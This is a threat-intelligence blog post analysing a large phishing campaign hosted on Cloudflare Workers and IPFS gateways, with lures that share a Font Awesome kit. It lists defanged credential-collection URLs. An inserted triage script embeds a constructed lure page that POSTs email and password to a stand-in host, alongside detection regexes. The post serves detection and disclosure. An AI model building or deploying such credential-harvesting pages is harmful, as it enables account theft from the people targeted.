One Font, Countless Frauds: Exposing Large-Scale Phishing Activity Abusing Cloudflare

Published on Nov 7, 2024

Exposing Massive Phishing Scams Abusing Cloudflare Services

Introduction

At Hunt, we seek to move beyond open directories and malware C2 frameworks. Our research team actively seeks out emerging threats using innovative tools like our experimental phishing crawler. Our commitment to ensuring our users and the broader security community are aware of ongoing threats led us to identify a widespread phishing campaign leveraging Cloudflare services.

What tipped us off? A shared Font Awesome kit across a massive number of websites hosting fake login pages. This discovery led us to over 60,000 links, most targeting login credentials for Microsoft's SharePoint and Office365 platforms. The campaign wasn't limited to Microsoft products; we've also encountered pages imitating DHL, Webmail Panels, and Mercari, to name a few.

In this post, we'll share some of the details of this interesting set of URLs in hopes it will help identify this threat before it hits your inbox.

What is Font Awesome?

Font Awesome is a popular library that easily integrates icons and fonts into web pages. Threat actors may find this toolkit (with over 30,000 items to choose from) valuable in tailoring the look of their phishing pages to create a sense of normalcy and trust for the user, making them less likely to suspect the phishing attempt.

Figure 1: Screenshot of Font Awesome setup page (source: https://fontawesome.com/start)


In this case, the particular Font Awesome kit used across the cluster of phishing domains is at https://kit[.]fontawesome[.]/585b051251.js.

The script's primary purpose is to manage the kit's configuration and loading of Font Awesome icons. It includes automatic SVG fetching (which requires a license), conflict detection, handling dynamic content changes, and ensuring icons are obtained from the correct location.

Figure 2: Snippet of fontawesome-585b051251.js (source: urlscan.io)


Phishing Activity Details

As all the phishing domains we found are hosted on Cloudflare, it's only fitting that they use their services. In this activity set, the scammers used either Cloudflare IPFS Gateways, distributing content from a decentralized network, or Cloudflare Workers, a serverless execution environment, to mask their malicious intent. *A handful do not use either service.

Below is a quick explanation of how threat actors can abuse these services:

  • IPFS Gateways: Phishing actors can exploit IPFS gateways to host phishing content in a decentralized manner, making it potentially more challenging to track down and take down.

  • Cloudflare Workers: While a legitimate service, malicious actors can misuse Cloudflare Workers to host phishing content or other malicious scripts, potentially making them appear to originate from a trusted source (Cloudflare).

We won't attempt to analyze all 60,000+ URLs in this post. Let's dive into a few examples to understand better how these phishing actors operate.

ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

The first link we will cover is hosted via CF Workers. It pretends to be an Adobe document, requiring users to enter their email credentials. The source code of the page is obfuscated by HTML character encoding. However, we can get around this by inspecting the page using the Web Developer tools.

Figure 3: Screenshot of HTML including font awesome and suspicious Javascript


The arrow near the top of the page highlights the Font Awesome 585b051251 script, and the second arrow shows JavaScript code buried at the bottom of the page. This code appears to deal with login functionality. Let's take a closer look.

Figure 4: JavaScript code found in ogukbm[.]nmbzts2qjn2150[.]workers[.]dev


Below is a brief breakdown of the code in Figure 4:

  1. The code checks for a value in the URL hash and uses it to pre-fill the email field (#email) if it exists.

  2. Upon submission of the form, the code prevents the default form submission behavior, retrieves the values from the email and password fields, and then clears the password field.

  3. An error message indicates login failure, incrementing the counter (count) variable to track login attempts.

  4. After two failed attempts, the page redirects the user to the official Adobe website (line 24).

  5. Next, the code uses regex to validate that the information entered in the email field matches the basic structure of an email address.

  6. Finally, if the count variable is less than 2, the code extracts the email and password and sends an AJAX request to https://ugiuk[.]dyndns[.]dk/sign4/Adobe.php.

*At the time of writing, the URL accepting the credentials is no longer responding.
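As an added example (not code from Hunt's crawler or from the original post), a small Python triage helper that applies the indicators described above to one fetched page: it undoes the HTML character-reference obfuscation seen on the Workers-hosted lure, classifies the hosting as a Cloudflare Workers or Cloudflare IPFS-gateway URL, looks for the shared kit ID 585b051251, and extracts credential-submission endpoints that point off the page's own host. The sample page, hostnames and collector domain are constructed, and the kit URL form kit.fontawesome.com/<id>.js is assumed.

```python
import html
import re
from urllib.parse import urlparse

# Shared Font Awesome kit identifier called out in the post; every host, path
# and page body below is constructed sample data, not an indicator from the post.
KIT_ID = "585b051251"
KIT_RE = re.compile(r"kit\.fontawesome\.\w+/" + KIT_ID + r"\.js")
# Credential sinks: jQuery $.ajax/$.post URLs, fetch() targets, or a <form action>.
AJAX_RE = re.compile(r"""(?:url\s*:\s*|fetch\(\s*|\.post\(\s*)['"](https?://[^'"]+)['"]""", re.I)
FORM_RE = re.compile(r"""<form[^>]+action=['"](https?://[^'"]+)['"]""", re.I)

def deobfuscate(source):
    """Strip HTML character-reference encoding (&#60; &#x3c; &lt; ...) until stable."""
    prev = None
    while source != prev:
        prev, source = source, html.unescape(source)
    return source

def hosting_type(url):
    """Classify hosting as the post does: CF Workers, CF IPFS gateway, or other."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    if host.endswith(".workers.dev"):
        return "cloudflare-workers"
    if host == "cloudflare-ipfs.com" and p.path.startswith("/ipfs/"):
        return "cloudflare-ipfs-gateway"
    return "other"

def triage(url, source):
    """Return the indicators a hunter would pivot on for one fetched page."""
    src = deobfuscate(source)
    page_host = (urlparse(url).hostname or "").lower()
    sinks = {m.group(1) for m in AJAX_RE.finditer(src)} | {m.group(1) for m in FORM_RE.finditer(src)}
    # Only off-host sinks matter: credentials leaving the page's own origin.
    exfil = sorted(u for u in sinks if (urlparse(u).hostname or "").lower() != page_host)
    result = {
        "hosting": hosting_type(url),
        "shared_kit": bool(KIT_RE.search(src)),
        "entity_encoded": src != source,
        "exfil_endpoints": exfil,
    }
    result["suspicious"] = result["shared_kit"] and bool(exfil)
    return result

# Constructed sample modelled on the Workers-hosted Adobe lure: entity-encoded
# source, the shared kit, and an AJAX POST of the credentials to a third party.
SAMPLE_URL = "https://abc123.example-acct.workers.dev/"
SAMPLE_HTML = (
    "<html><head>&#60;script src=&#34;https://kit.fontawesome.com/585b051251.js&#34;&#62;&#60;/script&#62;"
    "</head><body><form id=&#34;login&#34;><input id=&#34;email&#34;><input id=&#34;password&#34;></form>"
    "&#60;script&#62;$.ajax({type:&#34;POST&#34;,url:&#34;https://collector.example/sign4/Adobe.php&#34;,"
    "data:{email:e,password:p}});&#60;/script&#62;</body></html>"
)
```

Running `triage(SAMPLE_URL, SAMPLE_HTML)` flags the constructed page as suspicious because the shared kit and an off-host credential sink appear together; a page using its own kit and posting to its own origin is not flagged.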

weston1.html

Figure 5: [Screenshot](https://cloudflare-ipfs[.]com/ipfs/bafybeigxf3qo3vlnjqu53wirmlp4ox6cc3gat5jkyvhra66nkwba4ajnby/weston1.html)


Our second example leverages an IPFS gateway and a seemingly innocuous HTML page ('weston1.html') consisting of a Microsoft Word document to target Office365 credentials. The page also offers a "Sign in with Other Mail" option, suggesting a wider net for potential victims.

Again, in Figure 5, the arrows identify the Font Awesome script and a slightly more complex script buried at the bottom of the page.

Figure 6: Snippet of Javascript code inside weston1.html


The above image only includes the portion of code used to send the credentials to what is likely an actor-controlled server. The actual script was a few hundred lines; I'll provide a quick overview:

  1. The script initializes a dialog box/popup window containing an embedded login image for Gmail, Outlook, AOL, Office365, Yahoo, and 'Other'.

  2. Like the first script, the code validates the email address input into the email field and sends the credentials to https://usefuxoil[.]shop/high/boloadobe.php.

  3. The code redirects the user to a URL using the domain extracted from the user's email, even if the login was unsuccessful.

biocareremedies[.]in/admin/em/mnx/

Our third and final example is an oddity among the large group of URLs identified. In the URL above, we see a domain likely spoofing some type of healthcare organization but also using India's top-level domain (TLD). The domain isn't uncommon, but the phishing page contains the title "NetEast Enterprise Email -- Login Portal," with a login field over presumably the target's LinkedIn page.

Figure 7: Screenshot of biocareremedies[.]in


The login field reads, "Email login timeout, please login again." NetEase is a large free e-mail provider within China, and the page uses a similar favicon often seen on 163[.]com webpages.

Figure 8: Snippet of Javascript code for the spoofed LinkedIn page


A significant difference between the code in Figure 8 and the others we've looked at is that the attacker has decided not to send the credentials to additional infrastructure but to a PHP page. At the beginning of the script, a base64-encoded string (bmV4dC5waHa=), which decodes to 'next.php,' is initialized.

We can easily navigate to this page in the browser.

Figure 9: Error message at next.php


Conclusion

The continued rise of IPFS phishing highlights the need for security solutions that can adapt and learn. Anomaly detection tools that analyze traffic patterns and identify deviations from normal behavior offer a powerful approach to uncovering novel threats.

Sign up for Hunt today and be among the first to know when our crawler goes live. We will continue to inform the community as new phishing threats appear.
